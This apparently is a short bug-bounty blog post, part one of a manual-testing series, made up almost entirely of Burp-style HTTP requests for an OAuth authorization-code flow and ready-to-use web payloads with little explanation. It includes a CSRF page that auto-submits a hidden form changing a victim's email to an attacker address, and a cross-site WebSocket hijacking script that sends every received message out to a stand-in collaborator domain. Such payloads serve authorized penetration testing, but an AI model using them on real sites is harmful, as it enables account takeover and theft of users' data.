Bug Bounty — Manual Approach To Test Vulnerabilities (PART 1)

Manual testing using Burp Suite
GET /authorization?client_id=12345&redirect_uri=https://client-app.com/callback&response_type=code&scope=openid%20profile&state=ae13d489bd00e3c24 HTTP/1.1
Host: oauth-authorization-server.com

GET /callback?code=a1b2c3d4e5f6g7h8&state=ae13d489bd00e3c24 HTTP/1.1
Host: client-app.com

POST /token HTTP/1.1
Host: oauth-authorization-server.com
…
client_id=12345&client_secret=SECRET&redirect_uri=https://client-app.com/callback&grant_type=authorization_code&code=a1b2c3d4e5f6g7h8

<script>
// If the URL carries a fragment, reload with it moved into the query string
if (document.location.hash) {
    console.log("Hash identified — redirecting…");
    window.location = '/?' + document.location.hash.substr(1);
} else {
    console.log("No hash identified in URL");
}
</script>

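<html>
<body>
    <!-- Hidden form that posts a new email address to the email-change endpoint -->
    <form action="https://vulnerable-website.com/email/change" method="POST">
        <input type="hidden" name="email" value="pwned@evil-user.net" />
    </form>
    <script>
        // Submit the form as soon as the page loads
        document.forms[0].submit();
    </script>
</body>
</html>
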
<script>
var websocket = new WebSocket('wss://your-websocket-URL');
websocket.onopen = start;
websocket.onmessage = handleReply;

// Send READY once the connection opens
function start(event) {
    websocket.send("READY");
}

// Forward each message received on the socket to the collaborator domain
function handleReply(event) {
    fetch('https://your-collaborator-domain/?' + event.data, {mode: 'no-cors'});
}
</script>

apex

I try to analyze ransomware attacks | Static Code Analysis | Privacy & Security Updates | Pen Testing | Bug Bounty